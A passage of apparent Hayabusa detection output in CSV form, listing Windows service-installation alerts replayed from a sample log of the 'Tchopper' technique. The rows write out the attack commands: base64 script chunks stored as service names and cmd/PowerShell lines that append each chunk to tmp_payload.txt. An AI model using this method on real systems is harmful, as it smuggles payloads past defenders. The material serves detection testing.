Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:29.844 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:31.297 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:31.297 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:31.297 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:32.740 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:32.740 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:32.740 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:34.190 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:34.190 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:34.190 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:35.638 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:35.638 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:35.638 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:37.081 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:37.081 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:37.081 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:38.534 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:38.534 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:38.534 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:39.987 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:39.987 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:39.987 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:41.440 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:41.440 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:41.440 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:42.889 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:42.889 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:42.889 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:44.332 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:44.332 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:44.332 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:45.778 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:45.778 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:45.778 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:47.225 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:47.225 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:47.225 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
